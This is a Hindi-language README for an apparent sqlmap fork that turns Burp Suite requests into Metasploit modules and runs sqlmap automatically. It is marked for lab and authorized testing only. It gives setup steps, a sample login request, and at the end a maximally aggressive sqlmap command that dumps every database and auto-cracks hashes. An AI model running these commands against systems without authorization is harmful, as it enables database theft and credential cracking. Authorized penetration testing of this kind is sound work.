
पेशेवर विस्तार sqlmap परियोजना का
sqlmap-nu11secur1ty) - Kali Linuxलेखक: nu11secur1ty
विवरण: Burp Suite अनुरोधों से Metasploit सहायक मॉड्यूल जनरेट करें और sqlmap-nu11secur1ty को स्वचालित रूप से चलाएं।
महत्वपूर्ण: केवल प्रयोगशाला/अधिकृत परीक्षण के लिए।
यह जनरेटर आपको Burp Suite में कैप्चर किए गए किसी भी HTTP अनुरोध से एक Metasploit मॉड्यूल (.rb) बनाने की अनुमति देता है।
मॉड्यूल निम्नलिखित करेगा:
exploit.txt में सहेजें।sqlmap-nu11secur1ty को स्वचालित रूप से चलाएं।msfconsole के अंदर आसान उपयोग की अनुमति दें।sqlmap-nu11secur1ty/
├── sqlmap.py # SQLi testing engine
├── MSF/
│ ├── msf_rb_generator.py # Python generator
│ ├── YourModule.rb # Generated Metasploit module
│ └── exploit.txt # Saved HTTP request
सुनिश्चित करें कि
sqlmap.pyMSF/के पैरेंट फोल्डर में है।
MSF/ फोल्डर में एक टर्मिनल खोलें:
cd sqlmap-nu11secur1ty/MSF/
python3 msf_rb_generator.py
आपसे निम्नलिखित दर्ज करने के लिए कहा जाएगा:
आउटपुट फ़ाइल नाम (जैसे, MyModule.rb)
मॉड्यूल नाम (जैसे, SQLi-Test)
लेखक का नाम
मॉड्यूल विवरण
Burp अनुरोध पेस्ट करें → एक पंक्ति END के साथ समाप्त करें
उदाहरण:
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin
END
फोल्डर बनाएं, जैसे, auxiliary के अंदर MSF/
मैन्युअल रूप से कॉपी करना:
sudo cp /path/to/MyModule.rb /usr/share/metasploit-framework/modules/auxiliary/MSF/
sudo cp /path/to/exploit.txt /usr/share/metasploit-framework/modules/auxiliary/MSF/
स्वचालित करें:
Follow जनरेटर के निर्देशों का पालन करें...
उचित अनुमतियाँ सुनिश्चित करें (Metasploit को पढ़ने की पहुंच चाहिए):
sudo chmod 644 /usr/share/metasploit-framework/modules/auxiliary/MSF/MyModule.rb
चलाने के बाद, दो फ़ाइलें उत्पन्न होंगी:
.rb Metasploit मॉड्यूल (MyModule.rb)
exploit.txt जिसमें सहेजा गया अनुरोध है
msfconsole
use auxiliary/MSF/MyModule.rb
set RAW_REQUEST `cat exploit.txt`
run
python3 /home/kali/sqlmap-nu11secur1ty/sqlmap.py -r exploit.txt --no-cast --no-escape --dbms=mysql --time-sec=11 --random-agent --level=5 --risk=3 --batch --flush-session --technique=TBEUSQ --union-char=UCHAR --answers="crack=Y,dict=Y,continue=Y,quit=N" --dump-all
sqlmap_cmd = "python3 #{sqlmap_path} -r #{request_file} --batch --level=3 --risk=2"